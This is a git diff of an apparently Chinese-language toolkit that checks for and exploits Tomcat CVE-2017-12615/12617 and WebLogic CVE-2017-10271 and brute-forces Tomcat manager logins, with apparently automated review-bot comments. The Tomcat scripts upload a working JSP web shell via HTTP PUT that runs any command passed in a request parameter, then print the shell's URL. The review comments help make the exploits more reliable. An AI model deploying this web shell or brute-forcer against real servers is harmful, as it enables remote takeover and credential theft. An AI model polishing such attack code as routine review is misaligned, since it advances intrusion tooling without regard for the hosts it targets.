diff --git a/README.md b/README.md index 11c8476..dffe04f 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,11 @@ # vulnerability-list -常见漏洞快速检测,目前包含以下漏洞。 - +常见漏洞快速检测,目前包含以下漏洞。 + +已发现的BUG: + +1. 有些漏洞的判断依据为网页返回信息,但部分网站设置了统一的错误页面,如统一的404页面,因此造成误报。后续针对此类问题通用的解决方式是显示返回页面的大小。 + ## Tomcat - CVE_2017_12615 / CVE_2017_12617 diff --git a/tomcat/CVE_2017_12615.py b/tomcat/CVE_2017_12615.py index 15da3b4..bbff8c8 100644 --- a/tomcat/CVE_2017_12615.py +++ b/tomcat/CVE_2017_12615.py @@ -17,7 +17,8 @@ def attack(URL): url = URL + '/T68t8YT86.jsp/' user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" headers={"User-Agent":user_agent} - data="""<% + data="""CVE-2017-12615 + <% if("fff".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; @@ -33,7 +34,7 @@ def attack(URL): requests.put(url, headers=headers, data=data) time.sleep(2) verify_response = requests.get(url[:-1], headers=headers) - if verify_response.status_code == 200: + if verify_response.status_code == 200 and 'CVE-2017-12615' in verify_response.text: print('存在-Tomcat-CVE-2017-12615!!!') print('shell: ' + url[:-1]+'?pwd=fff&cmd=whoami') else : diff --git a/tomcat/CVE_2017_12617.py b/tomcat/CVE_2017_12617.py index ea82c4d..22d634c 100644 --- a/tomcat/CVE_2017_12617.py +++ b/tomcat/CVE_2017_12617.py @@ -20,7 +20,8 @@ def gen_shell(): def construct_put(url, f): #print(url) - evil = """<% + evil = """CVE-2017-12617 + <% if("fff".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; @@ -55,4 +56,4 @@ def attack(URL): if __name__ == '__main__': - attack() \ No newline at end of file + attack() diff --git a/tomcat/example_vulnerability.py b/tomcat/example_vulnerability.py index e161fdb..2a2f980 100644 --- a/tomcat/example_vulnerability.py 
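Review bot: The marker `CVE-2017-12615` that this hunk prepends to the uploaded JSP body is a literal that the file's second hunk (`@@ -33,7 +34,7 @@`) repeats verbatim in its `in verify_response.text` test; if one copy is edited the other silently stops matching and every target then reads as clean. Define it once above the function, `MARKER = 'CVE-2017-12615'`, then build `data = MARKER + """` followed by the existing body and test `MARKER in verify_response.text`, so the write and the check cannot drift apart. A one-line comment on the `data` assignment explaining why the marker sits outside the `<% %>` scriptlet (it is echoed back unchanged, which is what proves the file was stored and is being served) would help the next reader. attack() starts before this hunk and its body continues beyond it.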
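Review bot: The result of `requests.put(url, headers=headers, data=data)` two lines above the changed `if` is discarded, so when the server refuses the upload (a 403 or 405 from a servlet that is correctly configured read-only) the follow-up GET simply lands in the `else` branch with no indication why. Capture it, `put_response = requests.put(url, headers=headers, data=data)`, and include `put_response.status_code` in the negative-result message so a hardened host can be told apart from a request that never got through. Neither request passes a `timeout`, so an unresponsive host blocks the whole scan indefinitely; `timeout=10` on both calls is the usual fix. The remainder of attack() lies outside this hunk.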
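Review bot: The `CVE-2017-12617` marker added to `evil` has no matching consumer anywhere in this diff — unlike CVE_2017_12615.py, whose second hunk tests for its marker in the served response — so unless construct_put's caller already inspects the body for it (not visible here) the extra text alters the uploaded payload without improving the verdict. If the verification lives elsewhere in the file, make it use the same literal, ideally via a module constant shared with `evil` rather than a second copy of the string. The `@@ -55,4 +56,4 @@` hunk of this file only restores the trailing newline and needs nothing. construct_put continues past the end of this hunk.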
+++ b/tomcat/example_vulnerability.py @@ -38,12 +38,12 @@ def attack(URL): if verify_response.status_code == 200 or 304 or 401: try: - print('页面返回状态码:'+str(verify_response.status_code)+' '+url) - except: + print('页面返回状态码:'+str(verify_response.status_code)+' '+'页面返回大小为:'+str(len(verify_response.text))+' '+url) # 因为部分网站设置了统一的404页面,造成误报,因此添加返回长度来进行辅助判断 + except Exception: pass - else : + else: continue - except : + except Exception: print("Someerror!") print('[+]检测结束-Tomcat-example_vulnerability。[+]') print('\n') diff --git a/tomcat/tomcat_weakpasswd.py b/tomcat/tomcat_weakpasswd.py index 7f21367..14c116f 100644 --- a/tomcat/tomcat_weakpasswd.py +++ b/tomcat/tomcat_weakpasswd.py @@ -24,10 +24,10 @@ def attack(URL): headers = {"User-Agent": user_agent,"Authorization":Authorization} try: r = requests.get(url,headers=headers, verify=False) - if r.status_code == 200: - print('[+]发现弱口令'+Authorization) + if r.status_code == 200 and 'Tomcat Web Application Manager' in r.text: + print('[+]发现弱口令'+ txt) elif r.status_code == 401: - print('账户密码错误:',txt) + print('账户密码错误:', txt) else: print('[-]爆破密码出错。') except: diff --git a/weblogic/CVE_2017_10271.py b/weblogic/CVE_2017_10271.py index ca157d7..81c2d36 100644 --- a/weblogic/CVE_2017_10271.py +++ b/weblogic/CVE_2017_10271.py @@ -1,9 +1,12 @@ # -*- coding: utf-8 -*- +import sys import requests +import time from random import * import string + ''' Usage: moon.py -u weblogic http://127.0.0.1:7001
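Review bot: The lengthened print on the `+` line is reached for every response, because the surrounding guard `if verify_response.status_code == 200 or 304 or 401:` (context, two lines above) is always true — `304` and `401` are non-zero integers, so the `or` chain never compares the status against them — which defeats the comment's stated purpose of letting a reader weed out uniform 404 pages, since 404 responses are printed too. The intended test is `if verify_response.status_code in (200, 304, 401):`. `len(verify_response.text)` counts decoded characters rather than bytes; if the size is meant to be compared against a known error-page size, `len(verify_response.content)` is the stable measure. The new `except Exception: pass` around a plain print still hides encoding failures silently; the enclosing loop and outer `try` begin before this hunk.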
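Review bot: The bare `except:` on the last line of this hunk is left as-is while the example_vulnerability.py hunk in the same commit narrows its handlers to `except Exception:`; a bare clause also swallows KeyboardInterrupt, so the loop cannot be stopped with Ctrl-C, and the handler body is outside the hunk. Change it to `except requests.RequestException:` (or at least `except Exception:`) for consistency with the other file. The `requests.get` on the line above uses `verify=False`, which silences certificate errors against HTTPS hosts and has no `timeout`; if disabling verification is intentional, a one-line comment saying so, plus `timeout=10`, belong on that call. attack() and the loop that supplies `txt` begin before this hunk.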